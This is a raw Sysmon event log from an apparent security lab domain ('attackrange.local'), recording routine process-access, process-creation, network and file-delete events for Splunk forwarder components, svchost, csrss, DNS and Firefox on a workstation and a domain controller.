07:59:32.070{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082987Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.070{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082986Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.070{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082985Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.070{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082984Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.070{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082983Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.070{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B464-615A-8201-00000000FD01}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082982Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.070{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B464-615A-8201-00000000FD01}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082981Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:32.071{2FDD8D40-B464-615A-8201-00000000FD01}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000106607Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:33.637{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9933436F5824741FF13A8D07BFC01335,SHA256=AE8A6C61BF064863140ADC8E2EA41C7409EF7C34B2FC123D2EF2B92406788977,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083013Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:30.562{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50134-false10.0.1.12-8000- 23542300x800000000000000083012Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:33.133{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42B3C8BAB0E5FC98BD7F427789B5EE37,SHA256=AC4BB7CD956E61318F1658955E70BBC254D1506FD0A0B6B676DCB3C38E70155C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106606Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:30.890{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local58164- 10341000x800000000000000083011Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:33.023{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B465-615A-8301-00000000FD01}3336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083010Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083009Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083008Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083007Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083006Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083005Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083004Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083003Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083002Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:33.023{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083001Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:33.023{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B465-615A-8301-00000000FD01}3336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083000Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:33.023{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B465-615A-8301-00000000FD01}3336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082999Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:33.024{2FDD8D40-B465-615A-8301-00000000FD01}3336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000106612Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:34.652{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09F6367484E563D79E838D450026DEAF,SHA256=496E54B57174828983154B3ACBA92E7FDFEBA2B94B4112165014C4146ED20A34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106611Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:34.642{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2f710|C:\Program Files\Mozilla Firefox\xul.dll+e5ba99|C:\Program Files\Mozilla Firefox\xul.dll+e5b4a7|C:\Program Files\Mozilla Firefox\xul.dll+8bf380|C:\Program Files\Mozilla Firefox\xul.dll+8b39ad|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083029Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:34.648{2FDD8D40-B466-615A-8401-00000000FD01}40122432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083028Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:34.492{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B466-615A-8401-00000000FD01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083027Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 